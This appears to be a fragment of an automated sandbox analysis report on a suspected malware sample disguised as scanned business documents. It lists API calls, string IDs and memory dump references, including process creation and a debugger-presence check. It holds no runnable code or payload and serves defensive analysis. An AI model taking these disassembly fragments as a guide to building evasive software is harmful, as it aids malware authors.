                                                      • Instruction Fuzzy Hash: 9001A775AE115567CB05FB91CA05AFE73A89B16340F641026B802B72C1EA719F78CB72
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0029A529
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer_wcslen
                                                      • String ID: ,%5$3y-
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00353018,0035305C), ref: 003181BF
                                                      • CloseHandle.KERNEL32 ref: 003181D1
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: \05
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: 3, 3, 16, 1
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002E0B23
                                                      Similarity
                                                      • API ID: Message
                                                      • String ID: AutoIt$Error allocating memory.
                                                      APIs
                                                        • Part of subcall function 0029F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002A0D71,?,?,?,0028100A), ref: 0029F7CE
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0028100A), ref: 002A0D75
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0028100A), ref: 002A0D84
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002A0D7F
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0029E3D5
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: 0%5$8%5
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: %.3d$X64
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0031232C
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0031233F
                                                        • Part of subcall function 002EE97B: Sleep.KERNEL32 ref: 002EE9F3
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0031236C
                                                      • PostMessageW.USER32(00000000), ref: 00312373
                                                        • Part of subcall function 002EE97B: Sleep.KERNEL32 ref: 002EE9F3
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd